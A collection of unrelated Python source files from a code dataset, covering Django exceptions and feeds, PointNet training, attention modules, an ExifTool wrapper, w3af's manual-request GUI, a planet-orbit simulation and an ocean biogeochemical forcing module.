('H', 'C'): 1.09 * ANG2BOHR,
('H', 'N'): 1.01 * ANG2BOHR,
('H', 'O'): 0.95 * ANG2BOHR,
('H', 'Cl'): 1.275 * ANG2BOHR,
('C', 'C'): 1.54 * ANG2BOHR,
('C', 'N'): 1.47 * ANG2BOHR,
('C', 'O'): 1.43 * ANG2BOHR,
('N', 'N'): 1.45 * ANG2BOHR,
('N', 'O'): 1.45 * ANG2BOHR,
('O', 'O'): 1.40 * ANG2BOHR,
('C', 'Cl'): 1.74 * ANG2BOHR,
('Cl', 'Cl'): 2.0 * ANG2BOHR,
}
| StarcoderdataPython |
1754077 | from django.core.exceptions import ValidationError
class HttpError(Exception):
pass
class TrustChainHttpError(HttpError):
pass
class UnknownKid(Exception):
pass
class MissingJwksClaim(ValidationError):
pass
class MissingAuthorityHintsClaim(ValidationError):
pass
class NotDescendant(ValidationError):
pass
class TrustAnchorNeeded(ValidationError):
pass
class MetadataDiscoveryException(ValidationError):
pass
class MissingTrustMark(ValidationError):
pass
class InvalidRequiredTrustMark(ValidationError):
pass
class InvalidTrustchain(ValidationError):
pass
class InvalidEntityConfiguration(ValidationError):
pass
| StarcoderdataPython |
188043 | <reponame>yiming107/Pointnet_Pointnet2_pytorch<filename>train_cls.py
"""
Author: Benny
Date: Nov 2019
Modified by: Yiming
Main changes: compatible to train other dataset
"""
from data_utils.ModelNetDataLoader import ModelNetDataLoader
from data_utils.ReplicaDataLoader import ReplicaDataLoader
import argparse
import numpy as np
import os
import torch
import datetime
import logging
from pathlib import Path
from tqdm import tqdm
import sys
import provider
import importlib
import shutil
from torch.utils.tensorboard import SummaryWriter
import torch.nn as nn
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = BASE_DIR
sys.path.append(os.path.join(ROOT_DIR, 'models'))
def parse_args():
'''PARAMETERS'''
parser = argparse.ArgumentParser('PointNet')
parser.add_argument('--batch_size', type=int, default=16, help='batch size in training [default: 24]')
parser.add_argument('--dataset_name', type=str, default="replica", help='dataset name to use [default: modelnet40]') #modelnet40_normal_resampled
parser.add_argument('--model', default='pointnet2_cls_msg', help='model name [default: pointnet_cls]')
parser.add_argument('--epoch', default=1000, type=int, help='number of epoch in training [default: 200]')
parser.add_argument('--learning_rate', default=0.001, type=float, help='learning rate in training [default: 0.001]')
parser.add_argument('--gpu', type=str, default='0', help='specify gpu device [default: 0]')
parser.add_argument('--num_point', type=int, default=1024, help='Point Number [default: 1024]')
parser.add_argument('--optimizer', type=str, default='Adam', help='optimizer for training [default: Adam]')
parser.add_argument('--log_dir', type=str, default='pointnet2_cls_msg', help='experiment root')
parser.add_argument('--decay_rate', type=float, default=1e-4, help='decay rate [default: 1e-4]')
parser.add_argument('--normal', action='store_true', default=False, help='Whether to use normal information [default: False]')
return parser.parse_args()
def test(model, loader, device, num_class):
mean_correct = []
class_acc = np.zeros((num_class, 3))
for j, data in tqdm(enumerate(loader), total=len(loader)):
points, target = data
target = target[:, 0]
points = points.transpose(2, 1)
points, target = points.to(device), target.to(device)
classifier = model.eval()
pred, _ = classifier(points)
pred_choice = pred.data.max(1)[1]
for cat in np.unique(target.cpu()):
classacc = pred_choice[target==cat].eq(target[target==cat].long().data).cpu().sum()
class_acc[cat,0]+= classacc.item()/float(points[target==cat].size()[0])
class_acc[cat,1]+=1
correct = pred_choice.eq(target.long().data).cpu().sum()
mean_correct.append(correct.item()/float(points.size()[0]))
class_acc[:,2] = class_acc[:,0]/ class_acc[:,1]
class_acc = np.mean(class_acc[:,2])
instance_acc = np.mean(mean_correct)
return instance_acc, class_acc
def main(args):
def log_string(str):
logger.info(str)
print(str)
'''HYPER PARAMETER'''
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
'''CREATE DIR'''
timestr = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M'))
experiment_dir = Path('./log/')
experiment_dir.mkdir(exist_ok=True)
dataset_name = args.dataset_name
experiment_dir = experiment_dir.joinpath('classification_{}'.format(dataset_name))
experiment_dir.mkdir(exist_ok=True)
if args.log_dir is None:
experiment_dir = experiment_dir.joinpath(timestr)
else:
experiment_dir = experiment_dir.joinpath(args.log_dir)
experiment_dir.mkdir(exist_ok=True)
checkpoints_dir = experiment_dir.joinpath('checkpoints/')
checkpoints_dir.mkdir(exist_ok=True)
log_dir = experiment_dir.joinpath('logs/')
log_dir.mkdir(exist_ok=True)
'''LOG'''
args = parse_args()
logger = logging.getLogger("Model")
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler('%s/%s.txt' % (log_dir, args.model))
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
log_string('PARAMETER ...')
log_string(args)
'''TENSORBOARD LOG'''
writer = SummaryWriter()
'''DATA LOADING'''
log_string('Load dataset ...')
DATA_PATH = os.path.join(ROOT_DIR, 'data', dataset_name)
print("loading dataset from {}".format(dataset_name))
if 'modelnet' in dataset_name:
TRAIN_DATASET = ModelNetDataLoader(DATA_PATH, split='train',
normal_channel=args.normal)
TEST_DATASET = ModelNetDataLoader(DATA_PATH, split='test',
normal_channel=args.normal)
num_class = 40
else:
print(DATA_PATH)
TRAIN_DATASET = ReplicaDataLoader(DATA_PATH, split='train', uniform=True, normal_channel=False, rot_transform=True)
TEST_DATASET = ReplicaDataLoader(DATA_PATH, split='test', uniform=True, normal_channel=False, rot_transform=False)
num_class = 31
trainDataLoader = torch.utils.data.DataLoader(TRAIN_DATASET, batch_size=args.batch_size, shuffle=True, num_workers=6)
testDataLoader = torch.utils.data.DataLoader(TEST_DATASET, batch_size=args.batch_size, shuffle=False, num_workers=6)
'''MODEL LOADING'''
print("Number of classes are {:d}".format(num_class))
MODEL = importlib.import_module(args.model)
shutil.copy('./models/%s.py' % args.model, str(experiment_dir))
shutil.copy('./models/pointnet_util.py', str(experiment_dir))
print("Obtain GPU device ")
train_GPU = True
device = torch.device("cuda" if (torch.cuda.is_available() and train_GPU) else "cpu")
print(device)
print("Load the network to the device ")
classifier = MODEL.get_model(num_class, normal_channel=args.normal).to(device)
print("Load the loss to the device ")
criterion = MODEL.get_loss().to(device)
if os.path.exists((str(experiment_dir) + '/checkpoints/best_model.pth')):
checkpoint = torch.load(str(experiment_dir) + '/checkpoints/best_model.pth')
start_epoch = checkpoint['epoch']
classifier.load_state_dict(checkpoint['model_state_dict'])
# strict set to false to allow using the model trained with modelnet
else:
start_epoch = 0
if dataset_name == 'replica':
log_string('Use pretrain model of Model net')
# double check again if there is pretrained modelnet model
checkpoint = torch.load(str(experiment_dir).replace("replica", 'modelnet40_normal_resampled')+'/checkpoints/best_model.pth')
classifier = MODEL.get_model(40, normal_channel=args.normal).to(device)
classifier.load_state_dict(checkpoint['model_state_dict'])
classifier.fc3 = nn.Linear(256, num_class).to(device)
print(classifier)
else:
log_string('No existing model, starting training from scratch...')
if args.optimizer == 'Adam':
print("Using Adam opimizer ")
optimizer = torch.optim.Adam(
classifier.parameters(),
lr=args.learning_rate,
betas=(0.9, 0.999),
eps=1e-08,
weight_decay=args.decay_rate
)
else:
optimizer = torch.optim.SGD(classifier.parameters(), lr=0.01, momentum=0.9)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.7)
global_epoch = 0
global_step = 0
best_instance_acc = 0.0
best_class_acc = 0.0
mean_correct = []
'''TRANING'''
logger.info('Start training...')
for epoch in range(start_epoch, args.epoch):
loss_array = np.zeros((len(trainDataLoader),1))
log_string('Epoch %d (%d/%s):' % (global_epoch + 1, epoch + 1, args.epoch))
classifier.train() # setting the model to train mode
print("Clear GPU cache ...")
torch.cuda.empty_cache()
scheduler.step()
for batch_id, data in tqdm(enumerate(trainDataLoader, 0), total=len(trainDataLoader), smoothing=0.9):
points, target = data
points = points.data.numpy()
points = provider.random_point_dropout(points)
points[:, :, 0:3] = provider.random_scale_point_cloud(points[:, :, 0:3])
points[:, :, 0:3] = provider.shift_point_cloud(points[:, :, 0:3])
points = torch.Tensor(points)
target = target[:, 0]
points = points.transpose(2, 1)
points, target = points.to(device), target.to(device)
optimizer.zero_grad()
pred, trans_feat = classifier(points) ### This is the part of the runtime error:
loss = criterion(pred, target.long(), trans_feat)
loss_array[batch_id] = loss.cpu().detach().numpy()
pred_choice = pred.data.max(1)[1]
correct = pred_choice.eq(target.long().data).cpu().sum()
mean_correct.append(correct.item() / float(points.size()[0]))
loss.backward()
optimizer.step()
global_step += 1
train_instance_acc = np.mean(mean_correct)
log_string('Train Instance Accuracy: %f' % train_instance_acc)
avg_loss = np.mean(loss_array[:])
writer.add_scalar("Loss/train", avg_loss, epoch)
## This is for validation
with torch.no_grad():
instance_acc, class_acc = test(classifier.eval(), testDataLoader, device, num_class)
writer.add_scalar("ClassAccuracy/test", class_acc, epoch)
writer.add_scalar("InstanceAccuracy/test", instance_acc, epoch)
if (instance_acc >= best_instance_acc):
best_instance_acc = instance_acc
best_epoch = epoch + 1
if (class_acc >= best_class_acc):
best_class_acc = class_acc
log_string('Test Instance Accuracy: %f, Class Accuracy: %f'% (instance_acc, class_acc))
log_string('Best Instance Accuracy: %f, Class Accuracy: %f'% (best_instance_acc, best_class_acc))
if (instance_acc >= best_instance_acc):
logger.info('Save model...')
savepath = str(checkpoints_dir) + '/best_model.pth'.format(epoch)
log_string('Saving at %s'% savepath)
state = {
'epoch': best_epoch,
'instance_acc': instance_acc,
'class_acc': class_acc,
'model_state_dict': classifier.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}
torch.save(state, savepath)
global_epoch += 1
logger.info('End of training...')
writer.flush()
writer.close()
if __name__ == '__main__':
args = parse_args()
main(args)
| StarcoderdataPython |
3223378 | <reponame>Dou-Yu-xuan/deep-learning-visal
import torch
import torch.nn as nn
import torch.nn.functional as F
class _PositionAttentionModule(nn.Module):
""" Position attention module"""
def __init__(self, in_channels, **kwargs):
super(_PositionAttentionModule, self).__init__()
self.conv_b = nn.Conv2d(in_channels, in_channels // 8, 1)
self.conv_c = nn.Conv2d(in_channels, in_channels // 8, 1)
self.conv_d = nn.Conv2d(in_channels, in_channels, 1)
self.alpha = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
batch_size, _, height, width = x.size()
feat_b = self.conv_b(x).view(batch_size, -1, height * width).permute(0, 2, 1)
feat_c = self.conv_c(x).view(batch_size, -1, height * width)
attention_s = self.softmax(torch.bmm(feat_b, feat_c))
feat_d = self.conv_d(x).view(batch_size, -1, height * width)
feat_e = torch.bmm(feat_d, attention_s.permute(0, 2, 1)).view(batch_size, -1, height, width)
out = self.alpha * feat_e + x
return out
class _ChannelAttentionModule(nn.Module):
"""Channel attention module"""
def __init__(self, **kwargs):
super(_ChannelAttentionModule, self).__init__()
self.beta = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
batch_size, _, height, width = x.size()
feat_a = x.view(batch_size, -1, height * width)
feat_a_transpose = x.view(batch_size, -1, height * width).permute(0, 2, 1)
attention = torch.bmm(feat_a, feat_a_transpose)
attention_new = torch.max(attention, dim=-1, keepdim=True)[0].expand_as(attention) - attention
attention = self.softmax(attention_new)
feat_e = torch.bmm(attention, feat_a).view(batch_size, -1, height, width)
out = self.beta * feat_e + x
return out
class _DAHead(nn.Module):
def __init__(self, in_channels, nclass, aux=True, norm_layer=nn.BatchNorm2d, norm_kwargs=None, **kwargs):
super(_DAHead, self).__init__()
self.aux = aux
inter_channels = in_channels // 4
self.conv_p1 = nn.Sequential(
nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.conv_c1 = nn.Sequential(
nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.pam = _PositionAttentionModule(inter_channels, **kwargs)
self.cam = _ChannelAttentionModule(**kwargs)
self.conv_p2 = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.conv_c2 = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
self.out = nn.Sequential(
nn.Dropout(0.1),
nn.Conv2d(inter_channels, nclass, 1)
)
if aux:
self.conv_p3 = nn.Sequential(
nn.Dropout(0.1),
nn.Conv2d(inter_channels, nclass, 1)
)
self.conv_c3 = nn.Sequential(
nn.Dropout(0.1),
nn.Conv2d(inter_channels, nclass, 1)
)
def forward(self, x):
feat_p = self.conv_p1(x)
feat_p = self.pam(feat_p)
feat_p = self.conv_p2(feat_p)
feat_c = self.conv_c1(x)
feat_c = self.cam(feat_c)
feat_c = self.conv_c2(feat_c)
feat_fusion = feat_p + feat_c
outputs = []
fusion_out = self.out(feat_fusion)
outputs.append(fusion_out)
if self.aux:
p_out = self.conv_p3(feat_p)
c_out = self.conv_c3(feat_c)
outputs.append(p_out)
outputs.append(c_out)
return tuple(outputs)
| StarcoderdataPython |
180941 | <gh_stars>1-10
from django.contrib.syndication.views import Feed
from django.template.defaultfilters import truncatewords_html
from django.utils.safestring import mark_safe
from django.utils.html import strip_tags
from .models import Post
class LatestPostsFeed(Feed):
title = 'Bloggable'
link = ''
description = 'Latest posts of Bloggable'
def items(self):
return Post.published.all()[:10]
def item_title(self, item):
return item.title
def item_description(self, item):
return truncatewords_html(item.content,60)
| StarcoderdataPython |
3389632 | <gh_stars>100-1000
from __future__ import unicode_literals
from tests.utils import ConverterTestCase
class StructTestCase(ConverterTestCase):
def test_typedef_primitives(self):
self.assertGeneratedOutput(
"""
typedef unsigned foo1;
typedef unsigned short foo2;
typedef unsigned int foo3;
typedef unsigned long foo4;
typedef unsigned long long foo5;
typedef signed foo6;
typedef short foo7;
typedef int foo8;
typedef long foo9;
typedef long long foo10;
typedef float bar1;
typedef double bar2;
""",
"""
foo1 = int
foo2 = int
foo3 = int
foo4 = int
foo5 = int
foo6 = int
foo7 = int
foo8 = int
foo9 = int
foo10 = int
bar1 = float
bar2 = float
"""
)
def test_typedef_commutative(self):
self.assertGeneratedOutput(
"""
typedef int foo1;
typedef foo1 foo2;
""",
"""
foo1 = int
foo2 = foo1
"""
)
def test_typedef_struct(self):
self.assertGeneratedOutput(
"""
typedef struct {
float x;
float y;
} Foo;
""",
"""
class Foo:
def __init__(self, x=None, y=None):
self.x = x
self.y = y
"""
)
def test_typedef_named_struct(self):
self.assertGeneratedOutput(
"""
typedef struct Foo {
float x;
float y;
} Bar;
""",
"""
class Foo:
def __init__(self, x=None, y=None):
self.x = x
self.y = y
Bar = Foo
"""
)
| StarcoderdataPython |
1684409 | import json
import os
import subprocess
import logging
logger = logging.getLogger('debug')
class ExifTool:
"""
ExifTool class that is used to get song metadata
"""
sentinel = b"{ready}"
def __init__(self, executable="exiftool"):
self.executable = executable
self.running = False
def start(self):
with open('errors.txt', 'a') as err:
self._process = subprocess.Popen([self.executable, "-stay_open", "True",
"-@", "-", "-common_args", "-n",
"-charset", "filename=UTF-8", "-b"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=err)
self.running = True
def terminate(self):
if not self.running:
return
self._process.stdin.write(b"-stay_open\nFalse\n")
self._process.stdin.flush()
self._process.communicate()
del self._process
self.running = False
@staticmethod
def get_filenames(*files):
filenames = []
for file in files:
if isinstance(file, bytes):
filenames.append(file)
elif isinstance(file, str):
filenames.append(file.encode('utf-8'))
else:
raise TypeError('Filename must be bytes or str')
return b"\n".join(filenames)
def execute(self, *args):
if not self.running:
print('[ERROR] ExifTool is not running')
return
args = b"\n".join(args + (b"-execute\n",))
self._process.stdin.write(args)
self._process.stdin.flush()
output = b""
fd = self._process.stdout.fileno()
while not output.strip().endswith(self.sentinel):
output += os.read(fd, 4096)
return output.strip()[:-len(self.sentinel)]
def get_cover_art(self, *files):
args = (b"-Picture", b"-j")
pics = self.execute(*args, self.get_filenames(*files)).decode('utf-8')
try:
return json.loads(pics)
except Exception as e:
logger.info('Could not get metadata. {}\n{}\n{}'.format(', '.join(files), pics, e))
return {}
def get_metadata(self, *filenames):
args = (b"-j",)
js = self.execute(*args, self.get_filenames(*filenames)).decode('utf-8')
if js is not None:
try:
return json.loads(js)
except Exception as e:
logger.info('Could not get metadata. {}\n{}\n{}'.format(', '.join(filenames), js, e))
return {} | StarcoderdataPython |
1637331 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import unicodedata
import epitran
import argparse
def main(code):
epi = epitran.Epitran(code)
for line in sys.stdin: # pointless
line = line.decode('utf-8')
line = unicodedata.normalize('NFD', line.lower())
line = epi.transliterate(line)
line = line.encode('utf-8')
sys.stdout.write(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=u'Coverts text from STDIN (in the language specified),' +
'into Unicode IPA and emits it to STDOUT.')
parser.add_argument('code', help=u'ISO 639-3 code for conversion language')
args = parser.parse_args()
main(args.code)
| StarcoderdataPython |
180709 | <filename>packages/w3af/w3af/core/ui/gui/tools/manual_requests.py
"""
manual_requests.py
Copyright 2007 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import gtk
import gobject
import threading
from w3af.core.ui.gui import helpers, entries
from w3af.core.ui.gui.reqResViewer import ReqResViewer
from w3af.core.ui.gui.tools.helpers.threaded_impact import ThreadedURLImpact
from w3af.core.controllers.exceptions import (BaseFrameworkException,
ScanMustStopException,
HTTPRequestException,
ProxyException)
MANUAL_REQUEST_EXAMPLE = """\
GET http://w3af.org/ HTTP/1.1
Host: w3af.org
User-Agent: Firefox
"""
class ManualRequests(entries.RememberingWindow):
"""Infrastructure to generate manual HTTP requests.
:author: <NAME> <facundobatista =at= taniquetil.com.ar>
"""
def __init__(self, w3af, initial_request=None):
super(ManualRequests, self).__init__(w3af, "manualreq",
"w3af - Manual Requests",
"Manual_Requests")
self.w3af = w3af
#
# Toolbar
#
self.send_but = entries.SemiStockButton(_("Send"), gtk.STOCK_MEDIA_PLAY,
_("Send HTTP request"))
self.send_but.connect("clicked", self._send)
self.send_but.show()
# Fix content length checkbox
self._fix_content_len_cb = gtk.CheckButton('Fix content length header')
self._fix_content_len_cb.set_active(True)
self._fix_content_len_cb.show()
# request-response viewer
self.reqresp = ReqResViewer(w3af, [self.send_but.set_sensitive],
withManual=False, editableRequest=True)
self.reqresp.response.set_sensitive(False)
self.vbox.pack_start(self.reqresp, True, True)
self.vbox.pack_start(self._fix_content_len_cb, False, False)
self.vbox.pack_start(self.send_but, False, False)
# Add a default request
if initial_request is None:
self.reqresp.request.show_raw(MANUAL_REQUEST_EXAMPLE, '')
else:
initial_up, initial_dn = initial_request
self.reqresp.request.show_raw(initial_up, initial_dn)
# Show all!
self.show()
def _send(self, widg):
"""Actually sends the manual requests.
:param widg: who sent the signal.
"""
tsup, tlow = self.reqresp.request.get_both_texts()
busy = gtk.gdk.Window(self.window, gtk.gdk.screen_width(),
gtk.gdk.screen_height(), gtk.gdk.WINDOW_CHILD,
0, gtk.gdk.INPUT_ONLY)
busy.set_cursor(gtk.gdk.Cursor(gtk.gdk.WATCH))
busy.show()
while gtk.events_pending():
gtk.main_iteration()
# Get the fix content length value
fix_content_len = self._fix_content_len_cb.get_active()
# threading game
event = threading.Event()
impact = ThreadedURLImpact(self.w3af, tsup, tlow, event,
fix_content_len)
def impact_done():
if not event.isSet():
return True
busy.destroy()
if impact.ok:
self.reqresp.response.set_sensitive(True)
self.reqresp.response.show_object(impact.httpResp)
self.reqresp.nb.next_page()
elif hasattr(impact, 'exception'):
known_exceptions = (BaseFrameworkException,
ScanMustStopException,
HTTPRequestException,
ProxyException)
if not isinstance(impact.exception, known_exceptions):
raise impact.exception
else:
msg = "Stopped sending requests because of the following"\
" unexpected error:\n\n%s"
self.reqresp.response.clear_panes()
self.reqresp.response.set_sensitive(False)
gtk.gdk.threads_enter()
helpers.FriendlyExceptionDlg(msg % impact.exception)
gtk.gdk.threads_leave()
else:
# This is a very strange case, because impact.ok == False
# but impact.exception does not exist!
self.reqresp.response.clear_panes()
self.reqresp.response.set_sensitive(False)
gtk.gdk.threads_enter()
helpers.FriendlyExceptionDlg('Errors occurred while sending'
' the HTTP request.')
gtk.gdk.threads_leave()
return False
impact.start()
gobject.timeout_add(200, impact_done) | StarcoderdataPython |
1799414 | <reponame>super-goose/orbit
import pygame
import math
class Planet:
def __init__(self, surface, color, position, radius, center):
self.radius = radius
self.surface = surface
self.color = color
self.setPosition(position)
self.center = center
self.setOrbitOffset(0)
self.setOrbitPeriod(1)
self.setOrbitRadius(0)
self.year = 0
self.mass = 0
self.velocity = 0
self.angle = 0
self.name = ''
def drawPlanet(self):
x = int(self.position[0])
y = int(self.position[1])
pygame.draw.circle(self.surface, self.color, (x, y), self.radius)
def getRadius(self): return self.radius
def setPosition(self, newPos):
self.position = newPos
return self
def getPosition(self): return self.position
def setVelocity(self, vel):
self.velocity = vel
return self
def getVelocity(self): return self.velocity
def setAngle(self, angle):
self.angle = angle
return self
def getAngle(self): return self.angle
def setName(self, name):
self.name = name
return self
def getName(self): return self.name
def setGravity(self, gravity):
self.gravity = gravity
return self
def getGravity(self): return self.gravity
def setOrbitRadius(self, radius):
self.orbitRadius = radius
return self
def getOrbitRadius(self): return self.orbitRadius
def setOrbitOffset(self, offset):
self.orbitOffset = offset
return self
def getOrbitOffset(self): return self.orbitOffset
def setOrbitPeriod(self, period):
self.orbitPeriod = period
return self
def getOrbitPeriod(self): return self.orbitPeriod
def advancePosition(self, sun):
x, y = self.position
# get new point with no gravity
v = self.velocity
angle = self.angle
vx = v * math.sin(angle)
vy = v * math.cos(angle)
# get the pull fromt he sun
gravitaionalConstant = 14 # this is the number that made it work well
# i don't know why this number and not another
sunX, sunY = sun.getPosition()
sunX -= x
sunY -= y
d = math.sqrt(sunX**2 + sunY**2)
g = sun.getGravity() * gravitaionalConstant / (d ** 2)
ax = (g * sunX) / d
ay = (g * sunY) / d
# add these vectors together
dx = vx + ax
dy = vy + ay
newV = math.sqrt(dx**2 + dy**2)
# using law of cosines to get the angle
# by getting the cosine first, then using arccos to find the angle
ac = (g**2 - v**2 - newV**2)/(-2 * v * newV)
A = math.acos(ac)
#update attributes
self.angle += A
self.velocity = newV
x += newV * math.sin(self.angle)
y += newV * math.cos(self.angle)
self.setPosition((x, y))
return self
def distanceFrom(self, pos):
x1 = self.position[0]
y1 = self.position[1]
x2 = pos[0]
y2 = pos[1]
return math.sqrt((x1 - x2)**2 + (y1 - y2)**2)
# EOF for planets | StarcoderdataPython |
97669 | import numpy as np
import redis
import json
import logging
from docopt import docopt
from obnl.core.client import ClientNode
# This doc is used by docopt to make the wrapper callable by command line and gather easily all the given parameters
doc = """>>> IntegrCiTy wrapper command <<<
Usage:
wrapper.py (<host> <name> <init>) [--i=TO_SET... --o=TO_GET... --first --cmd=CMD]
wrapper.py -h | --help
wrapper.py --version
Options
-h --help show this
--version show version
--i parameters to set
--o parameters to get
--first node in sequence's first group
--cmd optional list of commands to run wrapper
"""
class Node(ClientNode):
"""
Node class for the wrapper (model can be called by the container or can be self contained directly in the wrapper)
"""
def __init__(self, host, input_attributes=None, output_attributes=None, is_first=False):
# Implement OBNL client node
super(Node, self).__init__(host, 'obnl_vhost', 'obnl', 'obnl', 'config_file.json',
input_attributes=input_attributes,
output_attributes=output_attributes,
is_first=is_first)
self.redis = redis.StrictRedis(host=host, port=6379, db=0)
# Declare model
self.a = 0
self.b = 0
self.c = None
# Set initial values / model parameters
with open('init_values.json') as json_data:
init_values = json.load(json_data)
for key, val in init_values.items():
setattr(self, key, val)
def step(self, current_time, time_step):
"""
Run a step for the wrapper/model
:param current_time: current simulation time
:param time_step: next time step to run
:return: nothing :)
"""
logging.debug('----- ' + self.name + ' -----')
logging.debug(self.name, 'time_step', time_step, "s")
logging.debug(self.name, 'current_time', current_time - time_step)
logging.debug(self.name, 'inputs', self.input_values)
# Update input attributes and save input attributes and corresponding simulation time step to Redis DB
for key, value in self.input_values.items():
setattr(self, key, value)
self.redis.rpush('IN||' + self.name + '||' + key, getattr(self, key))
self.redis.rpush('IN||' + self.name + '||' + key + '||time', current_time)
# Compute intern state
logging.debug(self.name, "compute new intern state")
self.b = self.a + np.random.choice([-1, 1]) * self.c
# Send updated output attributes
logging.debug(self.name, "outputs", {key: getattr(self, key) for key in self.output_attributes})
for key in self.output_attributes:
self.update_attribute(key, getattr(self, key))
# Save output attributes and corresponding simulation time step to Redis DB
for key in self.output_attributes:
self.redis.rpush('OUT||' + self.name + '||' + key, getattr(self, key))
self.redis.rpush('OUT||' + self.name + '||' + key + '||time', current_time)
if __name__ == "__main__":
args = docopt(doc, version='0.0.1')
node = Node(
host=args['<host>'],
is_first=args['--first'],
input_attributes=args['--i'],
output_attributes=args['--o']
)
node.start()
| StarcoderdataPython |
107271 | '''
Created on Nov 19, 2013
@author: <NAME>
<EMAIL>
Department of Geography, UGA
'''
'''
Create initial table for tweet storing
'''
import dbf
table = dbf.Table("Tweet.dbf","TweetID C(20);TweetText C(200);TweetTime C(30); TweetLat C(30);TweetLon C(30);UserID C(30);UserName C(30);UserLoc C(30); CheckTime C(20)")
table.close() | StarcoderdataPython |
1730688 | <filename>BFM17_POM1D_VrsFnl/src/pom/coupling/ModuleForcing.py
# WARNING THIS IS A TEST VERSION
# (MONTHLY FREQUENCY)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# MODEL BFM - Biogeochemical Flux Model
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleGlobalMem import RLEN
from BFM17_POM1D_VrsFnl.src.pom.phys.POMModule import KB
from decimal import *
import numpy as np
getcontext().prec = 12 # 12-digit precision (ilong)
# MONTHLY SHORTWAVE RADIATION
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# N.B.!
# ALWAYS NEEDED: WHEN THE MODEL IS RUN IN DIAGNOSTIC MODE PROVIDES ONLY PAR TO BFM.
# IN PROGNOSTIC CONTRIBUTES TO THE DEFINITION OF THE TEMPERATURE SURFACE BOUNDARY CONDITION.
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
SWRAD1, SWRAD2 = Decimal()
# SLUX1, SLUX2 = Decimal()
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# N.B.!
# THE FOLLOWING SCALARS ARE USED ONLY WHEN THE MODEL IS RUN IN PROGNOSTIC MODE.
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# MONTHLY LOSS TERM OF THE SURFACE HEAT FLUX
WTSURF1, WTSURF2 = Decimal()
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# N.B.!
# THE FOLLOWING ARE ALWAYS USED.
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# PRESCRIBED T&S PROFILES
TSTAR, SSTAR = np.empty(KB,dtype=float)
# MONTHLY WIND STRESS
WSU1, WSU2, WSV1, WSV2 = Decimal()
# MONTHLY SURFACE SALINITY
SSS1, SSS2 = Decimal()
# MONTHLY BOTTOM OXYGEN
O2_b1, O2_b2 = Decimal()
# MONTHLY SURFACE AND BOTTOM NITRATE
NO3_s1, NO3_s2 = Decimal()
NO3_b1, NO3_b2 = Decimal()
# MONTHLY SURFACE AND BOTTOM PHOSPHATE
PO4_s1, PO4_s2 = Decimal()
PO4_b1, PO4_b2 = Decimal()
# MONTHLY SURFACE AMMONIA
NH4_s1, NH4_s2 = Decimal()
# MONTHLY BOTTOM PON GRADIENT
PON_b1, PON_b2 = Decimal()
# MONTHLY SURFACE SILICATE
SIO4_s1, SIO4_s2 = Decimal()
